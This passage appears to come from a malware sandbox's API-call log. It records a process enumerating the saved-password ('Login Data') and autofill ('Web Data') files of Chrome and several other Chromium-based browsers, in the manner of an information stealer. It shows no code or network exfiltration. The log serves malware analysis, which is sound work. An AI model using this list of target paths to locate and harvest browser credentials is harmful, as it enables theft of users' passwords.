0x780000 [0312.487] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x410) returned 0x796378 [0312.488] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.488] SHGetValueW (in: hkey=0x80000002, pszSubKey="SOFTWARE\\Mozilla\\Flock", pszValue="CurrentVersion", pdwType=0x0, pvData=0x796378, pcbData=0x19fba4*=0x104 | out: pdwType=0x0, pvData=0x796378, pcbData=0x19fba4*=0x104) returned 0x2 [0312.488] GetProcessHeap () returned 0x780000 [0312.488] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x796378 | out: hHeap=0x780000) returned 1 [0312.489] GetProcessHeap () returned 0x780000 [0312.489] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x208) returned 0x793dc8 [0312.489] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0312.490] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x793dc8 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0312.494] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.494] StrStrW (lpFirst="C:\\Program Files (x86)", lpSrch="(x86)") returned="(x86)" [0312.496] GetProcessHeap () returned 0x780000 [0312.496] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x208) returned 0x798120 [0312.497] ExpandEnvironmentStringsW (in: lpSrc="%ProgramW6432%", lpDst=0x798120, nSize=0x104 | out: lpDst="C:\\Program Files") returned 0x11 [0312.497] GetProcessHeap () returned 0x780000 [0312.497] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f6a) returned 0x798330 [0312.498] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0312.499] wvsprintfW (in: param_1=0x798330, param_2="%s\\NETGATE\\Black Hawk", arglist=0x19fbb4 | out: param_1="C:\\Program Files\\NETGATE\\Black Hawk") returned 35 [0312.499] GetProcessHeap () returned 0x780000 [0312.499] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x4a) returned 0x786fd8 [0312.499] GetProcessHeap () returned 0x780000 [0312.499] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798330 | out: hHeap=0x780000) returned 1 [0312.500] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.500] PathFileExistsW (pszPath="C:\\Program Files\\NETGATE\\Black Hawk") returned 0 [0312.501] GetProcessHeap () returned 0x780000 [0312.501] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x786fd8 | out: hHeap=0x780000) returned 1 [0312.501] GetProcessHeap () returned 0x780000 [0312.502] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798120 | out: hHeap=0x780000) returned 1 [0312.502] GetProcessHeap () returned 0x780000 [0312.502] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3fcc) returned 0x798120 [0312.503] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0312.503] wvsprintfW (in: param_1=0x798120, param_2="%s\\Lunascape\\Lunascape6\\plugins\\{9BDD5314-20A6-4d98-AB30-8325A95771EE}", arglist=0x19fbbc | out: param_1="C:\\Program Files (x86)\\Lunascape\\Lunascape6\\plugins\\{9BDD5314-20A6-4d98-AB30-8325A95771EE}") returned 90 [0312.503] GetProcessHeap () returned 0x780000 [0312.504] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0xb8) returned 0x79c0f8 [0312.504] GetProcessHeap () returned 0x780000 [0312.504] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798120 | out: hHeap=0x780000) returned 1 [0312.505] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.505] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Lunascape\\Lunascape6\\plugins\\{9BDD5314-20A6-4d98-AB30-8325A95771EE}") returned 0 [0312.505] GetProcessHeap () returned 0x780000 [0312.506] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79c0f8 | out: hHeap=0x780000) returned 1 [0312.517] GetProcessHeap () returned 0x780000 [0312.517] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x208) returned 0x798120 [0312.517] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0312.518] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x798120 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0312.519] GetProcessHeap () returned 0x780000 [0312.519] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f84) returned 0x798330 [0312.520] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0312.520] wvsprintfW (in: param_1=0x798330, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f778 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comodo\\Dragon\\User Data\\Default\\Login Data") returned 78 [0312.520] GetProcessHeap () returned 0x780000 [0312.520] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0xa0) returned 0x78ada8 [0312.520] GetProcessHeap () returned 0x780000 [0312.521] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798330 | out: hHeap=0x780000) returned 1 [0312.521] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.521] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comodo\\Dragon\\User Data\\Default\\Login Data") returned 0 [0312.522] GetProcessHeap () returned 0x780000 [0312.522] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x78ada8 | out: hHeap=0x780000) returned 1 [0312.522] GetProcessHeap () returned 0x780000 [0312.522] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f80) returned 0x798330 [0312.522] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0312.523] wvsprintfW (in: param_1=0x798330, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comodo\\Dragon\\User Data\\Default\\Web Data") returned 76 [0312.523] GetProcessHeap () returned 0x780000 [0312.523] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x9c) returned 0x78a3d0 [0312.523] GetProcessHeap () returned 0x780000 [0312.524] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798330 | out: hHeap=0x780000) returned 1 [0312.524] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.524] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comodo\\Dragon\\User Data\\Default\\Web Data") returned 0 [0312.524] GetProcessHeap () returned 0x780000 [0312.525] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x78a3d0 | out: hHeap=0x780000) returned 1 [0312.525] GetProcessHeap () returned 0x780000 [0312.525] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f5e) returned 0x798330 [0312.525] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0312.526] wvsprintfW (in: param_1=0x798330, param_2="%s%s\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalComodo\\Dragon\\Login Data") returned 59 [0312.526] GetProcessHeap () returned 0x780000 [0312.526] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x7a) returned 0x79c298 [0312.526] GetProcessHeap () returned 0x780000 [0312.526] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798330 | out: hHeap=0x780000) returned 1 [0312.559] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.559] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalComodo\\Dragon\\Login Data") returned 0 [0312.559] GetProcessHeap () returned 0x780000 [0312.560] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79c298 | out: hHeap=0x780000) returned 1 [0312.560] GetProcessHeap () returned 0x780000 [0312.560] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f6e) returned 0x798330 [0312.560] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0312.561] wvsprintfW (in: param_1=0x798330, param_2="%s%s\\Default\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalComodo\\Dragon\\Default\\Login Data") returned 67 [0312.561] GetProcessHeap () returned 0x780000 [0312.561] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x8a) returned 0x79c2a8 [0312.561] GetProcessHeap () returned 0x780000 [0312.562] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798330 | out: hHeap=0x780000) returned 1 [0312.563] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.563] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalComodo\\Dragon\\Default\\Login Data") returned 0 [0312.564] GetProcessHeap () returned 0x780000 [0312.564] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79c2a8 | out: hHeap=0x780000) returned 1 [0312.564] GetProcessHeap () returned 0x780000 [0312.564] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f84) returned 0x798330 [0312.565] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0312.565] wvsprintfW (in: param_1=0x798330, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f778 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\MapleStudio\\ChromePlus\\User Data\\Default\\Login Data") returned 87 [0312.565] GetProcessHeap () returned 0x780000 [0312.565] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0xb2) returned 0x79c2c0 [0312.565] GetProcessHeap () returned 0x780000 [0312.566] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798330 | out: hHeap=0x780000) returned 1 [0312.567] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.567] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\MapleStudio\\ChromePlus\\User Data\\Default\\Login Data") returned 0 [0312.567] GetProcessHeap () returned 0x780000 [0312.568] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79c2c0 | out: hHeap=0x780000) returned 1 [0312.568] GetProcessHeap () returned 0x780000 [0312.568] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f80) returned 0x798330 [0312.568] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0312.569] wvsprintfW (in: param_1=0x798330, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\MapleStudio\\ChromePlus\\User Data\\Default\\Web Data") returned 85 [0312.569] GetProcessHeap () returned 0x780000 [0312.569] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0xae) returned 0x79c2b8 [0312.569] GetProcessHeap () returned 0x780000 [0312.570] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798330 | out: hHeap=0x780000) returned 1 [0312.570] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.571] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\MapleStudio\\ChromePlus\\User Data\\Default\\Web Data") returned 0 [0312.571] GetProcessHeap () returned 0x780000 [0312.571] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79c2b8 | out: hHeap=0x780000) returned 1 [0312.571] GetProcessHeap () returned 0x780000 [0312.571] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f5e) returned 0x798330 [0312.572] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0312.573] wvsprintfW (in: param_1=0x798330, param_2="%s%s\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalMapleStudio\\ChromePlus\\Login Data") returned 68 [0312.573] GetProcessHeap () returned 0x780000 [0312.573] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x8c) returned 0x79c298 [0312.573] GetProcessHeap () returned 0x780000 [0312.573] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798330 | out: hHeap=0x780000) returned 1 [0312.574] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.574] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalMapleStudio\\ChromePlus\\Login Data") returned 0 [0312.575] GetProcessHeap () returned 0x780000 [0312.575] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79c298 | out: hHeap=0x780000) returned 1 [0312.575] GetProcessHeap () returned 0x780000 [0312.575] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f6e) returned 0x798330 [0312.576] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0312.576] wvsprintfW (in: param_1=0x798330, param_2="%s%s\\Default\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalMapleStudio\\ChromePlus\\Default\\Login Data") returned 76 [0312.576] GetProcessHeap () returned 0x780000 [0312.576] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x9c) returned 0x78a868 [0312.576] GetProcessHeap () returned 0x780000 [0312.577] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798330 | out: hHeap=0x780000) returned 1 [0312.578] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.578] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalMapleStudio\\ChromePlus\\Default\\Login Data") returned 0 [0312.578] GetProcessHeap () returned 0x780000 [0312.578] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x78a868 | out: hHeap=0x780000) returned 1 [0312.578] GetProcessHeap () returned 0x780000 [0312.578] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f84) returned 0x798330 [0312.579] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0312.580] wvsprintfW (in: param_1=0x798330, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f778 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data") returned 78 [0312.580] GetProcessHeap () returned 0x780000 [0312.580] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0xa0) returned 0x78aa60 [0312.580] GetProcessHeap () returned 0x780000 [0312.580] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798330 | out: hHeap=0x780000) returned 1 [0312.581] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.581] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data") returned 0 [0312.581] GetProcessHeap () returned 0x780000 [0312.581] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x78aa60 | out: hHeap=0x780000) returned 1 [0312.581] GetProcessHeap () returned 0x780000 [0312.581] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f80) returned 0x798330 [0312.582] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0312.583] wvsprintfW (in: param_1=0x798330, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data") returned 76 [0312.583] GetProcessHeap () returned 0x780000 [0312.583] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x9c) returned 0x78a3d0 [0312.583] GetProcessHeap () returned 0x780000 [0312.584] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798330 | out: hHeap=0x780000) returned 1 [0312.584] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.584] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data") returned 0 [0312.585] GetProcessHeap () returned 0x780000 [0312.585] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x78a3d0 | out: hHeap=0x780000) returned 1 [0312.585] GetProcessHeap () returned 0x780000 [0312.585] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f5e) returned 0x798330 [0312.586] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0312.586] wvsprintfW (in: param_1=0x798330, param_2="%s%s\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalGoogle\\Chrome\\Login Data") returned 59 [0312.586] GetProcessHeap () returned 0x780000 [0312.586] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x7a) returned 0x79c298 [0312.587] GetProcessHeap () returned 0x780000 [0312.587] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798330 | out: hHeap=0x780000) returned 1 [0312.588] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.588] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalGoogle\\Chrome\\Login Data") returned 0 [0312.588] GetProcessHeap () returned 0x780000 [0312.588] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79c298 | out: hHeap=0x780000) returned 1 [0312.588] GetProcessHeap () returned 0x780000 [0312.588] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f6e) returned 0x798330 [0312.590] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0312.590] wvsprintfW (in: param_1=0x798330, param_2="%s%s\\Default\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalGoogle\\Chrome\\Default\\Login Data") returned 67 [0312.590] GetProcessHeap () returned 0x780000 [0312.591] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x8a) returned 0x79c2a8 [0312.591] GetProcessHeap () returned 0x780000 [0312.591] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798330 | out: hHeap=0x780000) returned 1 [0312.592] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.592] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalGoogle\\Chrome\\Default\\Login Data") returned 0 [0312.592] GetProcessHeap () returned 0x780000 [0312.592] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79c2a8 | out: hHeap=0x780000) returned 1 [0312.592] GetProcessHeap () returned 0x780000 [0312.592] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f84) returned 0x798330 [0312.593] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0312.594] wvsprintfW (in: param_1=0x798330, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f778 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Nichrome\\User Data\\Default\\Login Data") returned 73 [0312.594] GetProcessHeap () returned 0x780000 [0312.594] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x96) returned 0x79c2c0 [0312.594] GetProcessHeap () returned 0x780000 [0312.594] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798330 | out: hHeap=0x780000) returned 1 [0312.595] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.595] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Nichrome\\User Data\\Default\\Login Data") returned 0 [0312.596] GetProcessHeap () returned 0x780000 [0312.596] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79c2c0 | out: hHeap=0x780000) returned 1 [0312.596] GetProcessHeap () returned 0x780000 [0312.596] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f80) returned 0x798330 [0312.597] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0312.597] wvsprintfW (in: param_1=0x798330, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Nichrome\\User Data\\Default\\Web Data") returned 71 [0312.597] GetProcessHeap () returned 0x780000 [0312.597] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x92) returned 0x79c2b8 [0312.597] GetProcessHeap () returned 0x780000 [0312.598] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798330 | out: hHeap=0x780000) returned 1 [0312.598] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.599] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Nichrome\\User Data\\Default\\Web Data") returned 0 [0312.599] GetProcessHeap () returned 0x780000 [0312.599] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79c2b8 | out: hHeap=0x780000) returned 1 [0312.599] GetProcessHeap () returned 0x780000 [0312.599] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f5e) returned 0x798330 [0312.600] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0312.601] wvsprintfW (in: param_1=0x798330, param_2="%s%s\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalNichrome\\Login Data") returned 54 [0312.601] GetProcessHeap () returned 0x780000 [0312.601] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x70) returned 0x79c298 [0312.601] GetProcessHeap () returned 0x780000 [0312.601] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798330 | out: hHeap=0x780000) returned 1 [0312.602] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.602] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalNichrome\\Login Data") returned 0 [0312.602] GetProcessHeap () returned 0x780000 [0312.603] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79c298 | out: hHeap=0x780000) returned 1 [0312.603] GetProcessHeap () returned 0x780000 [0312.603] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f6e) returned 0x798330 [0312.604] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0312.615] wvsprintfW (in: param_1=0x798330, param_2="%s%s\\Default\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalNichrome\\Default\\Login Data") returned 62 [0312.615] GetProcessHeap () returned 0x780000 [0312.615] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x80) returned 0x79c2a8 [0312.615] GetProcessHeap () returned 0x780000 [0312.616] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798330 | out: hHeap=0x780000) returned 1 [0312.616] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.617] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalNichrome\\Default\\Login Data") returned 0 [0312.617] GetProcessHeap () returned 0x780000 [0312.618] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79c2a8 | out: hHeap=0x780000) returned 1 [0312.618] GetProcessHeap () returned 0x780000 [0312.618] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f84) returned 0x798330 [0312.618] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0312.619] wvsprintfW (in: param_1=0x798330, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f778 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\RockMelt\\User Data\\Default\\Login Data") returned 73 [0312.619] GetProcessHeap () returned 0x780000 [0312.619] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x96) returned 0x79c2c0 [0312.619] GetProcessHeap () returned 0x780000 [0312.620] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798330 | out: hHeap=0x780000) returned 1 [0312.621] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.621] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\RockMelt\\User Data\\Default\\Login Data") returned 0 [0312.621] GetProcessHeap () returned 0x780000 [0312.622] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79c2c0 | out: hHeap=0x780000) returned 1 [0312.622] GetProcessHeap () returned 0x780000 [0312.622] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f80) returned 0x798330 [0312.622] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0312.623] wvsprintfW (in: param_1=0x798330, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\RockMelt\\User Data\\Default\\Web Data") returned 71 [0312.623] GetProcessHeap () returned 0x780000 [0312.623] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x92) returned 0x79c2b8 [0312.623] GetProcessHeap () returned 0x780000 [0312.624] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798330 | out: hHeap=0x780000) returned 1 [0312.625] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.625] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\RockMelt\\User Data\\Default\\Web Data") returned 0 [0312.625] GetProcessHeap () returned 0x780000 [0312.626] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79c2b8 | out: hHeap=0x780000) returned 1 [0312.626] GetProcessHeap () returned 0x780000 [0312.626] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f5e) returned 0x798330 [0312.626] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0312.627] wvsprintfW (in: param_1=0x798330, param_2="%s%s\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalRockMelt\\Login Data") returned 54 [0312.627] GetProcessHeap () returned 0x780000 [0312.627] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x70) returned 0x79c298 [0312.627] GetProcessHeap () returned 0x780000 [0312.628] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798330 | out: hHeap=0x780000) returned 1 [0312.628] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.629] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalRockMelt\\Login Data") returned 0 [0312.629] GetProcessHeap () returned 0x780000 [0312.629] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79c298 | out: hHeap=0x780000) returned 1 [0312.629] GetProcessHeap () returned 0x780000 [0312.629] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f6e) returned 0x798330 [0312.630] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0312.631] wvsprintfW (in: param_1=0x798330, param_2="%s%s\\Default\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalRockMelt\\Default\\Login Data") returned 62 [0312.631] GetProcessHeap () returned 0x780000 [0312.631] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x80) returned 0x79c2a8 [0312.631] GetProcessHeap () returned 0x780000 [0312.631] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798330 | out: hHeap=0x780000) returned 1 [0312.632] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.632] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalRockMelt\\Default\\Login Data") returned 0 [0312.632] GetProcessHeap () returned 0x780000 [0312.633] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79c2a8 | out: hHeap=0x780000) returned 1 [0312.633] GetProcessHeap () returned 0x780000 [0312.633] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f84) returned 0x798330 [0312.633] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0312.634] wvsprintfW (in: param_1=0x798330, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f778 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Spark\\User Data\\Default\\Login Data") returned 70 [0312.634] GetProcessHeap () returned 0x780000 [0312.634] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x90) returned 0x79c2c0 [0312.634] GetProcessHeap () returned 0x780000 [0312.635] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798330 | out: hHeap=0x780000) returned 1 [0312.635] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.636] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Spark\\User Data\\Default\\Login Data") returned 0 [0312.636] GetProcessHeap () returned 0x780000 [0312.637] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79c2c0 | out: hHeap=0x780000) returned 1 [0312.637] GetProcessHeap () returned 0x780000 [0312.637] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f80) returned 0x798330 [0312.637] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0312.638] wvsprintfW (in: param_1=0x798330, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f774 